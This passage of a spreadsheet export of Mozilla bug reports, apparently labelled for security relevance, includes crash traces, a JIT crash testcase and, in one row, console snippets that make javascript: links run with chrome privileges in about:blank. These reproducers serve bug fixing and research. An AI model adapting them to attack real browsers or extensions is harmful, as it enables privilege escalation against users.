    #20 0x7f0297092661 in nsHTMLDocument::Open(nsAString const&amp;, nsAString const&amp;, nsAString const&amp;, JSContext*, unsigned char, nsISupports**) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1435:14
    #21 0x7f02970985d7 in nsHTMLDocument::WriteCommon(JSContext*, nsAString const&amp;, bool) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1940:10
    #22 0x7f0297097a49 in nsHTMLDocument::WriteCommon(JSContext*, mozilla::dom::Sequence&lt;nsString&gt; const&amp;, bool, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1875:10
    #23 0x7f02965d4925 in mozilla::dom::HTMLDocumentBinding::write(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:654:9
    #24 0x7f029689344e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #25 0x7f029c0ccc63 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #26 0x7f029c0ccc63 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:455
    #27 0x7f029c0cd612 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:519:10
    #28 0x7f029cce08ee in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #29 0x7f029cc97f94 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #30 0x7f029ccc1153 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #31 0x7f029ccc3ab7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #32 0x7f029c0ccfb3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #33 0x7f029c0ccfb3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:437
    #34 0x7f029c0b568f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:506:12
    #35 0x7f029c0b568f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2997
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/netwerk/base/Predictor.cpp:191:8 in IsNullOrHttp
Shadow bytes around the buggy address:
  0x0c1a80011360: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c1a80011370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a80011380: 00 00 fa fa fa fa fa fa fa fa 00 00 00 00 00 00
  0x0c1a80011390: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c1a800113a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c1a800113b0: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa[fd]fd
  0x0c1a800113c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1a800113d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1a800113e0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c1a800113f0: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80011400: fd fd fd fa fa fa fa fa fa fa fa fa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3074==ABORTING</t>
        </is>
      </c>
      <c r="X5067" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5068">
      <c r="A5068" t="n">
        <v>1088226</v>
      </c>
      <c r="B5068" t="inlineStr">
        <is>
          <t>2014-10-23 12:16:50 -0700</t>
        </is>
      </c>
      <c r="C5068" t="inlineStr">
        <is>
          <t>Drain/undrain the treeherder webheads when deploying, to avoid 503s being seen</t>
        </is>
      </c>
      <c r="D5068" t="inlineStr">
        <is>
          <t>2015-03-14 08:34:20 -0700</t>
        </is>
      </c>
      <c r="E5068" t="n">
        <v>1</v>
      </c>
      <c r="F5068" t="n">
        <v>1</v>
      </c>
      <c r="G5068" t="n">
        <v>7</v>
      </c>
      <c r="H5068" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5068" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5068" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5068" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5068" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5068" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5068" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5068" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5068" t="inlineStr"/>
      <c r="Q5068" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5068" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5068" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5068" t="n">
        <v>1</v>
      </c>
      <c r="U5068" t="n">
        <v>0</v>
      </c>
      <c r="V5068" t="n">
        <v>7</v>
      </c>
      <c r="W5068" t="inlineStr">
        <is>
          <t>Currently if someone visits treeherder.m.o during a deploy, they get a server error (iirc; Ryan - could you confirm what you saw the other day?).
We should so some or all of:
* Have a fallback maintenance page if the processes are being restarted
* Rework the deploy script so the amount of time where prod is disrupted is kept to a minimum.
This is partly related to bug 1088204, in that if we stop displaying confusing errors (and so long as the UI recovers/retries), then fixing this bug will mean we can maybe wontfix bug 1088204 (unless we decide that messaging people to let them know that a change occurred, is a good idea so that they can keep an eye out for regressions etc).</t>
        </is>
      </c>
      <c r="X5068" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5069">
      <c r="A5069" t="n">
        <v>569162</v>
      </c>
      <c r="B5069" t="inlineStr">
        <is>
          <t>2010-05-30 16:38:35 -0700</t>
        </is>
      </c>
      <c r="C5069" t="inlineStr">
        <is>
          <t>GC hazard with lookupProperty callers with scripted proxy handlers</t>
        </is>
      </c>
      <c r="D5069" t="inlineStr">
        <is>
          <t>2011-01-27 17:28:41 -0800</t>
        </is>
      </c>
      <c r="E5069" t="n">
        <v>1</v>
      </c>
      <c r="F5069" t="n">
        <v>1</v>
      </c>
      <c r="G5069" t="n">
        <v>3</v>
      </c>
      <c r="H5069" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5069" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5069" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5069" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L5069" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5069" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5069" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5069" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5069" t="inlineStr">
        <is>
          <t>[sg:critical?][ccbr][critsmash:patch][stale][1.9.x branches]</t>
        </is>
      </c>
      <c r="Q5069" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5069" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5069" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5069" t="n">
        <v>1</v>
      </c>
      <c r="U5069" t="n">
        <v>0</v>
      </c>
      <c r="V5069" t="n">
        <v>25</v>
      </c>
      <c r="W5069" t="inlineStr">
        <is>
          <t>lookupProperty and other object ops calls might not root obj.</t>
        </is>
      </c>
      <c r="X5069" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5070">
      <c r="A5070" t="n">
        <v>357374</v>
      </c>
      <c r="B5070" t="inlineStr">
        <is>
          <t>2006-10-20 00:53:09 -0700</t>
        </is>
      </c>
      <c r="C5070" t="inlineStr">
        <is>
          <t>Can't locate object method "use_for" via package "Bugzilla::Group"</t>
        </is>
      </c>
      <c r="D5070" t="inlineStr">
        <is>
          <t>2007-04-06 16:18:28 -0700</t>
        </is>
      </c>
      <c r="E5070" t="n">
        <v>1</v>
      </c>
      <c r="F5070" t="n">
        <v>1</v>
      </c>
      <c r="G5070" t="n">
        <v>4</v>
      </c>
      <c r="H5070" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5070" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5070" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K5070" t="inlineStr">
        <is>
          <t>2.22.1</t>
        </is>
      </c>
      <c r="L5070" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5070" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5070" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5070" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5070" t="inlineStr"/>
      <c r="Q5070" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5070" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5070" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T5070" t="n">
        <v>1</v>
      </c>
      <c r="U5070" t="n">
        <v>0</v>
      </c>
      <c r="V5070" t="n">
        <v>27</v>
      </c>
      <c r="W5070" t="inlineStr">
        <is>
          <t>Several users have reported that editgroups.cgi does not work for them in 2.22.1, and when they try to load it (just clicking on "Groups"), they get the following error:
undef error - Can't locate object method "use_for" via package
"Bugzilla::Group" at C:/Perl/site/lib/Template/Stash.pm line 870.
I can't reproduce this on landfill.</t>
        </is>
      </c>
      <c r="X5070" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5071">
      <c r="A5071" t="n">
        <v>1118894</v>
      </c>
      <c r="B5071" t="inlineStr">
        <is>
          <t>2015-01-07 11:46:22 -0800</t>
        </is>
      </c>
      <c r="C5071" t="inlineStr">
        <is>
          <t>Assertion failure: pred-&gt;isLoopBackedge(), at js/src/jit/IonAnalysis.cpp:1962</t>
        </is>
      </c>
      <c r="D5071" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:08 -0700</t>
        </is>
      </c>
      <c r="E5071" t="n">
        <v>1</v>
      </c>
      <c r="F5071" t="n">
        <v>1</v>
      </c>
      <c r="G5071" t="n">
        <v>3</v>
      </c>
      <c r="H5071" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5071" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5071" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5071" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5071" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5071" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5071" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5071" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5071" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main36+]</t>
        </is>
      </c>
      <c r="Q5071" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5071" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5071" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T5071" t="n">
        <v>1</v>
      </c>
      <c r="U5071" t="n">
        <v>0</v>
      </c>
      <c r="V5071" t="n">
        <v>18</v>
      </c>
      <c r="W5071" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 33781a3a5201 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --enable-debug, run with --fuzzing-safe --thread-count=2):
testcase()
function testcase() {
  var tokenCodes  = {};
  tokenCodes['const'] = 0;
  var arr = ['const'];
  for (var p in tokenCodes) {       
      for (var p1 in arr) {                
          if (arr[p1] === p) {
            var p1 = 100 * 1000;
            for (var arr = 0; arr != p1; ++arr) {}
          }
      }
  }
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xf7887b40 (LWP 16214)]
0x0838200d in AssertReversePostorder (graph=...) at js/src/jit/IonAnalysis.cpp:1962
1962	                MOZ_ASSERT(pred-&gt;isLoopBackedge());
#0  0x0838200d in AssertReversePostorder (graph=...) at js/src/jit/IonAnalysis.cpp:1962
#1  0x083821e0 in AssertGraphCoherency (graph=...) at js/src/jit/IonAnalysis.cpp:2034
#2  AssertGraphCoherency (graph=...) at js/src/jit/IonAnalysis.cpp:2111
#3  js::jit::AssertExtendedGraphCoherency (graph=...) at js/src/jit/IonAnalysis.cpp:2121
#4  0x083d55d1 in js::jit::OptimizeMIR (mir=0x973f030) at js/src/jit/Ion.cpp:1567
#5  0x083d5b66 in js::jit::CompileBackEnd (mir=0x973f030) at js/src/jit/Ion.cpp:1727
#6  0x086c0ea5 in js::HelperThread::handleIonWorkload (this=0x9674480) at js/src/vm/HelperThreads.cpp:1084
#7  0x086c25c9 in js::HelperThread::threadLoop (this=0x9674480) at js/src/vm/HelperThreads.cpp:1380
#8  0x0873ae35 in nspr::Thread::ThreadRoutine (arg=0x9673168) at js/src/vm/PosixNSPR.cpp:45
#9  0xf7fb8d4c in start_thread () from /lib/i386-linux-gnu/libpthread.so.0
#10 0xf7dacdde in clone () from /lib/i386-linux-gnu/libc.so.6
eax	0x0	0
ebx	0x963aff4	157528052
ecx	0xf7e648ac	-135903060
edx	0x0	0
esi	0x1	1
edi	0x9750cf8	158665976
ebp	0xf7886e98	4152913560
esp	0xf7886e60	4152913504
eip	0x838200d &lt;AssertReversePostorder(js::jit::MIRGraph&amp;)+157&gt;
=&gt; 0x838200d &lt;AssertReversePostorder(js::jit::MIRGraph&amp;)+157&gt;:	movl   $0x7b,0x0
   0x8382017 &lt;AssertReversePostorder(js::jit::MIRGraph&amp;)+167&gt;:	call   0x804a9d0 &lt;abort@plt&gt;</t>
        </is>
      </c>
      <c r="X5071" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5072">
      <c r="A5072" t="n">
        <v>4106</v>
      </c>
      <c r="B5072" t="inlineStr">
        <is>
          <t>1999-03-21 01:40:40 -0800</t>
        </is>
      </c>
      <c r="C5072" t="inlineStr">
        <is>
          <t>javascript mods to query.cgi do not work on MS IE</t>
        </is>
      </c>
      <c r="D5072" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:19 -0800</t>
        </is>
      </c>
      <c r="E5072" t="n">
        <v>1</v>
      </c>
      <c r="F5072" t="n">
        <v>1</v>
      </c>
      <c r="G5072" t="n">
        <v>4</v>
      </c>
      <c r="H5072" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5072" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5072" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5072" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5072" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5072" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N5072" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5072" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5072" t="inlineStr"/>
      <c r="Q5072" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5072" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5072" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T5072" t="n">
        <v>1</v>
      </c>
      <c r="U5072" t="n">
        <v>0</v>
      </c>
      <c r="V5072" t="n">
        <v>9</v>
      </c>
      <c r="W5072" t="inlineStr">
        <is>
          <t>the javascript added to query.cgi do not work on any version of MSIE, because
MSIE jscript does not support the .push method of an array object</t>
        </is>
      </c>
      <c r="X5072" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5073">
      <c r="A5073" t="n">
        <v>388121</v>
      </c>
      <c r="B5073" t="inlineStr">
        <is>
          <t>2007-07-13 21:45:46 -0700</t>
        </is>
      </c>
      <c r="C5073" t="inlineStr">
        <is>
          <t>[FIX]about:blank loaded by chrome in particular ways has chrome privileges</t>
        </is>
      </c>
      <c r="D5073" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5073" t="n">
        <v>1</v>
      </c>
      <c r="F5073" t="n">
        <v>1</v>
      </c>
      <c r="G5073" t="n">
        <v>3</v>
      </c>
      <c r="H5073" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5073" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5073" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5073" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5073" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5073" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5073" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5073" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5073" t="inlineStr">
        <is>
          <t>[sg:moderate] potentially critical for extensions that use this.</t>
        </is>
      </c>
      <c r="Q5073" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5073" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5073" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5073" t="n">
        <v>1</v>
      </c>
      <c r="U5073" t="n">
        <v>0</v>
      </c>
      <c r="V5073" t="n">
        <v>38</v>
      </c>
      <c r="W5073" t="inlineStr">
        <is>
          <t>window.open("about:blank");
  content.location = "about:blank";
about:blank loaded by chrome in these ways has chrome privileges.  This
behavior could cause security issues in certain extensions that are thinking
that about:blank does not have chrome privileges.
Imagine an extension that does:
1. Collect urls from content.
2. Load about:blank. (window.open("about:blank") or content.location =
"about:blank")
3. Generate links with the urls and insert those into the about:blank document.
When an user clicks a javascript: link in the generated page, the script run
with chrome privileges.
I'm not sure whether this should be fixed or not. If not, we need to advertise
the potential problem. (There is an affected extension on AMO.)
Test: Evaluate the following code in the error console.
w=open("about:blank");alert(1);u="javascript:alert(Components.stack);";w.document.body.innerHTML=u.link(u);w.focus();1
  or
top.opener.content.location="about:blank";alert(1);u="javascript:alert(Components.stack);";(w=top.opener.content).document.body.innerHTML=u.link(u);w.focus();1</t>
        </is>
      </c>
      <c r="X5073" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5074">
      <c r="A5074" t="n">
        <v>1594895</v>
      </c>
      <c r="B5074" t="inlineStr">
        <is>
          <t>2019-11-07 13:42:11 -0800</t>
        </is>
      </c>
      <c r="C5074" t="inlineStr">
        <is>
          <t>Suggestion: Add some kind of UI indicator to remind that tier3 jobs exist but are currently hidden</t>
        </is>
      </c>
      <c r="D5074" t="inlineStr">
        <is>
          <t>2020-02-20 17:07:56 -0800</t>
        </is>
      </c>
      <c r="E5074" t="n">
        <v>1</v>
      </c>
      <c r="F5074" t="n">
        <v>1</v>
      </c>
      <c r="G5074" t="n">
        <v>7</v>
      </c>
      <c r="H5074" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5074" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5074" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K5074" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5074" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5074" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5074" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5074" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5074" t="inlineStr">
        <is>
          <t>[lang=js]</t>
        </is>
      </c>
      <c r="Q5074" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5074" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5074" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5074" t="n">
        <v>1</v>
      </c>
      <c r="U5074" t="n">
        <v>0</v>
      </c>
      <c r="V5074" t="n">
        <v>10</v>
      </c>
      <c r="W5074" t="inlineStr">
        <is>
          <t>Tier3 test jobs on treeherder are easy to miss since tier3 is hidden by default. Perhaps it would be helpful to have some kind of a UI indicator on the 'menu bar' (?) above the push/rev, indicating that tier3 jobs do exist but are hidden.</t>
        </is>
      </c>
      <c r="X5074" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5075">
      <c r="A5075" t="n">
        <v>1251308</v>
      </c>
      <c r="B5075" t="inlineStr">
        <is>
          <t>2016-02-25 09:54:44 -0800</t>
        </is>
      </c>
      <c r="C5075" t="inlineStr">
        <is>
          <t>JS::DescribeScriptedCaller return value is now a lie in some cases</t>
        </is>
      </c>
      <c r="D5075" t="inlineStr">
        <is>
          <t>2017-01-05 09:12:47 -0800</t>
        </is>
      </c>
      <c r="E5075" t="n">
        <v>1</v>
      </c>
      <c r="F5075" t="n">
        <v>1</v>
      </c>
      <c r="G5075" t="n">
        <v>3</v>
      </c>
      <c r="H5075" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5075" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5075" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5075" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5075" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5075" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5075" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5075" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5075" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main48+]</t>
        </is>
      </c>
      <c r="Q5075" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5075" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5075" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T5075" t="n">
        <v>1</v>
      </c>
      <c r="U5075" t="n">
        <v>0</v>
      </c>
      <c r="V5075" t="n">
        <v>37</v>
      </c>
      <c r="W5075" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Could cause security problems; needs careful audit.
The API documentation for JS::DescribeScriptedCaller clearly says the return value indicates whether a scripted caller was found.
The patch for bug 1229642 changed the implementation so that now a false value could mean no scripted caller _or_ could mean the caller asked for a filename and we OOMed trying to create a copy of the filename.
Note that very long filenames are not hard to produce (e.g. inline &lt;script&gt; in a long data: URI), so OOM here doesn't necessarily mean we're really out of memory in any meaningful sense.  Further, since pages get to control the filename, this allows pages to (probabilistically, at least) cause JS::DescribeScriptedCaller to lie about whether there was a scripted caller.
I haven't audited all the codepaths that call this function, but it seems like at least the debugging stuff in nsGlobalWindow::ShowSlowScriptDialog will behave wonkily in this case, though not sure if it handles no filename right now.  Also, it looks like some callers do NOT check the return value (because they assume that it represents what it's documented to represent and they know they have a scripted caller) and then use filename.get().  See for example ReportWrapperDenial.  Will that work correctly (e.g. without crashing) in the OOM case in the new world?
And, again, I did _not_ audit anything close to all the consumers.  I'm pretty worried about what might be lurking in there.</t>
        </is>
      </c>
      <c r="X5075" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5076">
      <c r="A5076" t="n">
        <v>1037830</v>
      </c>
      <c r="B5076" t="inlineStr">
        <is>
          <t>2014-07-12 07:59:25 -0700</t>
        </is>
      </c>
      <c r="C5076" t="inlineStr">
        <is>
          <t>GMP encoder trusts plugin's length report</t>
        </is>
      </c>
      <c r="D5076" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:47 -0700</t>
        </is>
      </c>
      <c r="E5076" t="n">
        <v>1</v>
      </c>
      <c r="F5076" t="n">
        <v>1</v>
      </c>
      <c r="G5076" t="n">
        <v>3</v>
      </c>
      <c r="H5076" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5076" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5076" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K5076" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5076" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5076" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5076" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5076" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5076" t="inlineStr">
        <is>
          <t>[adv-main34+]</t>
        </is>
      </c>
      <c r="Q5076" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5076" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5076" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T5076" t="n">
        <v>1</v>
      </c>
      <c r="U5076" t="n">
        <v>0</v>
      </c>
      <c r="V5076" t="n">
        <v>19</v>
      </c>
      <c r="W5076" t="inlineStr">
        <is>
          <t>The following code processes encoded video data coming from the GMP plugin.
http://dxr.mozilla.org/mozilla-central/source/media/webrtc/signaling/src/media-conduit/WebrtcGmpVideoCodec.cpp#348
It reads the buffer length out of the packet at, for instance:
http://dxr.mozilla.org/mozilla-central/source/media/webrtc/signaling/src/media-conduit/WebrtcGmpVideoCodec.cpp#406
However, it does not check the buffer length and therefore a bogus size will
cause a read past the end of the buffer. We should be protecting against a misbehaving plugin here.</t>
        </is>
      </c>
      <c r="X5076" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5077">
      <c r="A5077" t="n">
        <v>170928</v>
      </c>
      <c r="B5077" t="inlineStr">
        <is>
          <t>2002-09-26 03:55:41 -0700</t>
        </is>
      </c>
      <c r="C5077" t="inlineStr">
        <is>
          <t>Mozilla becomes choppy after scrolling an IFrame within a frameset</t>
        </is>
      </c>
      <c r="D5077" t="inlineStr">
        <is>
          <t>2018-08-29 15:22:03 -0700</t>
        </is>
      </c>
      <c r="E5077" t="n">
        <v>1</v>
      </c>
      <c r="F5077" t="n">
        <v>1</v>
      </c>
      <c r="G5077" t="n">
        <v>3</v>
      </c>
      <c r="H5077" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5077" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5077" t="inlineStr">
        <is>
          <t>Layout: Images, Video, and HTML Frames</t>
        </is>
      </c>
      <c r="K5077" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5077" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5077" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5077" t="inlineStr">
        <is>
          <t>[ADT1]</t>
        </is>
      </c>
      <c r="Q5077" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5077" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5077" t="inlineStr">
        <is>
          <t>mozilla1.2beta</t>
        </is>
      </c>
      <c r="T5077" t="n">
        <v>1</v>
      </c>
      <c r="U5077" t="n">
        <v>0</v>
      </c>
      <c r="V5077" t="n">
        <v>36</v>
      </c>
      <c r="W5077" t="inlineStr">
        <is>
